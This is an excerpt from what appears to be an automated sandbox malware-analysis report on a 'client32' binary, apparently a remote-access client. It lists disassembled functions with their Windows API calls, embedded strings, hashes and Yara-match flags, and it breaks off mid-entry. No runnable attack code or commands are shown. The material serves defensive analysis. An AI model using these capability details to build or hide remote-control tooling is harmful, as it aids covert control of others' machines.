                                                                                  • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                  • API String ID: 2735369351-763374134
                                                                                  • Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                  • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                                  • Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                  • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                                  APIs
                                                                                  • GetClientRect.USER32(00000000,?), ref: 110056DD
                                                                                  • BeginPaint.USER32(?,?), ref: 110056E8
                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
                                                                                  • EndPaint.USER32(?,?), ref: 1100572F
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
                                                                                  • m_hWnd, xrefs: 110056C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 1216912278-2830328467
                                                                                  • Opcode ID: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                  • Instruction ID: 646bbc1308694ba02cb50681d3c8309cd3c635e6896d205317d73ea189e6e8a3
                                                                                  • Opcode Fuzzy Hash: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                  • Instruction Fuzzy Hash: FA1194B5A40219BFD714CBA0CD85FBEB3BCEB88709F104569F51796584DBB0A904C764
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(76937AA0,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B94C7
                                                                                  • GetCursorPos.USER32(110C032C), ref: 110B94D6
                                                                                    • Part of subcall function 1115F5B0: GetWindowRect.USER32(?,?), ref: 1115F5CC
                                                                                  • PtInRect.USER32(110C032C,110C032C,110C032C), ref: 110B94F4
                                                                                  • ClientToScreen.USER32(?,110C032C), ref: 110B9516
                                                                                  • SetCursorPos.USER32(110C032C,110C032C,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9524
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 110B9531
                                                                                  • SetCursor.USER32(00000000,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9538
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                  • String ID:
                                                                                  • API String ID: 3235510773-0
                                                                                  • Opcode ID: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                                  • Instruction ID: e413c7048e2c9fc99527a8bfd6ed1c185ebac442807b3b09d80bd78fd45dd6ba
                                                                                  • Opcode Fuzzy Hash: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                                  • Instruction Fuzzy Hash: A8115B72A4020E9BDB18DFA4C984DAFF7BCFB48215B004569E52297644DB34E906CBA4
                                                                                  APIs
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                                  • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                  • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                    • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                    • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                    • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                    • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                    • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                  • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                  • _free.LIBCMT ref: 1100B3C8
                                                                                  • _free.LIBCMT ref: 1100B3CE
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                  • String ID:
                                                                                  • API String ID: 705253285-0
                                                                                  • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                  • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                                  • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                  • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                                  • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                                  • API String ID: 2776021309-3012761530
                                                                                  • Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                  • Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
                                                                                  • Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                  • Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 1101D66E
                                                                                  • LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
                                                                                  • RegisterClassExA.USER32(00000030), ref: 1101D6F1
                                                                                  • GetLastError.KERNEL32 ref: 1101D6F7
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 430917334-4108050209
                                                                                  • Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                  • Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
                                                                                  • Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                  • Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99
                                                                                  APIs
                                                                                  • LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                                  • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                  • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                  • API String ID: 468487828-934300333
                                                                                  • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                  • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                                  • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                  • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                  APIs
                                                                                  • LoadMenuA.USER32(00000000,00002EF1), ref: 1100348D
                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 110034B3
                                                                                  • DestroyMenu.USER32(00000000), ref: 110034E2
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                  • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                  • API String ID: 468487828-934300333
                                                                                  • Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                  • Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
                                                                                  • Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                  • Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9
                                                                                  APIs
                                                                                  • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                                  • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                                  • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                                  • CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 2375713580-0
                                                                                  • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                  • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                                  • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                  • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11040BBA,00000000), ref: 1113D7C5
                                                                                  • CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
                                                                                  • SetEvent.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D805
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,11040BBA,00000000), ref: 1113D816
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D829
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D83C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  • API ID: CloseCreateEventHandle$ObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 414154005-0
                                                                                  • Opcode ID: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                  • Instruction ID: 02350ad9304c652d5973a468123ac0969e3fb67a745117c4f7e49a1723ee0a3b
                                                                                  • Opcode Fuzzy Hash: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                  • Instruction Fuzzy Hash: 9F11CE705C8265AAF7298BE5C9A8B95FFA4934631DF50402AF2389658CCBB02088CB54
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 111715AE
                                                                                    • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                    • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                  • __amsg_exit.LIBCMT ref: 111715CE
                                                                                  • __lock.LIBCMT ref: 111715DE
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 111715FB
                                                                                  • _free.LIBCMT ref: 1117160E
                                                                                  • InterlockedIncrement.KERNEL32(02641708), ref: 11171626
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                  • String ID:
                                                                                  • API String ID: 3470314060-0
                                                                                  • Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                  • Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
                                                                                  • Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                  • Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
                                                                                  • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
                                                                                  • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  • API ID: CloseHandle$EventObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 2857295742-0
                                                                                  • Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                  • Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
                                                                                  • Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                  • Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F
                                                                                    • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                    • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                    • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                    • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                  • GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  • API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
                                                                                  • String ID: Survey$pcicl32.dll$toastImageAndText.png
                                                                                  • API String ID: 2477883239-2305317391
                                                                                  • Opcode ID: 36c5674273f243e941f224807b5ad49c9c103fe6826938d503f0889e95c6792e
                                                                                  • Instruction ID: a37ee32854b15c041e991ad0c80392c526a8d8f631297bf945f8db0117e793ba
                                                                                  • Opcode Fuzzy Hash: 36c5674273f243e941f224807b5ad49c9c103fe6826938d503f0889e95c6792e
                                                                                  • Instruction Fuzzy Hash: 3871E27590465A9FE709CF64C8D8FEAB7F5EB48308F1485A9D5198B381EB30E944CB50
                                                                                  APIs
                                                                                  • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
                                                                                    • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                                  • EqualRect.USER32(?,?), ref: 1107740C
                                                                                  • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                                  • m_hWnd, xrefs: 11077447
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  • API ID: Window$DeferEqualPointsRect
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 2754115966-2830328467
                                                                                  • Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                  • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
                                                                                  • Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                  • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 1104971C
                                                                                  • _free.LIBCMT ref: 11049779
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • CLTCONN.CPP, xrefs: 11049708
                                                                                  • ReleaseSmartcardDevice called, xrefs: 110496BD
                                                                                  • idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcess_free_mallocwsprintf
                                                                                  • String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
                                                                                  • API String ID: 3300666597-3188990991
                                                                                  • Opcode ID: a96d33cc2ee08905e30f1eec18a566e6825b27c160358a4790fc3fe5e536e1e6
                                                                                  • Instruction ID: e35be207329a9a02e71ffc0183289b31f5ea9fbf546850573bb4cc18e029b419
                                                                                  • Opcode Fuzzy Hash: a96d33cc2ee08905e30f1eec18a566e6825b27c160358a4790fc3fe5e536e1e6
                                                                                  • Instruction Fuzzy Hash: D041AEB5A01611AFD704CF98D880EAAFBE4FB48328F6142BDE52997350E730A940CB95
                                                                                  APIs
                                                                                  • GetMenu.USER32(?), ref: 110BD4A4
                                                                                  • GetSubMenu.USER32(00000000,00000002), ref: 110BD4E5
                                                                                  • DrawMenuBar.USER32(?), ref: 110BD50D
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD48E
                                                                                  • m_hWnd, xrefs: 110BD493
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 381722633-2830328467
                                                                                  • Opcode ID: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                  • Instruction ID: 2ed85e2a360b3d02c99ae53d45e4f65cdbccb9b7267b746ab424cefae630bdcb
                                                                                  • Opcode Fuzzy Hash: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                  • Instruction Fuzzy Hash: 9B1151BAE00219AFCB04DFA5C894CAFF7B9BF49308B00457EE11697254DB74AD05CB94
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(?,1113A2AB,00000001,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102D75C
                                                                                  • InterlockedIncrement.KERNEL32(111EE418), ref: 1102D799
                                                                                  • InterlockedDecrement.KERNEL32(111EE418), ref: 1102D7C0
                                                                                  Strings
                                                                                  • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F
                                                                                  • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementIncrementVersion
                                                                                  • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
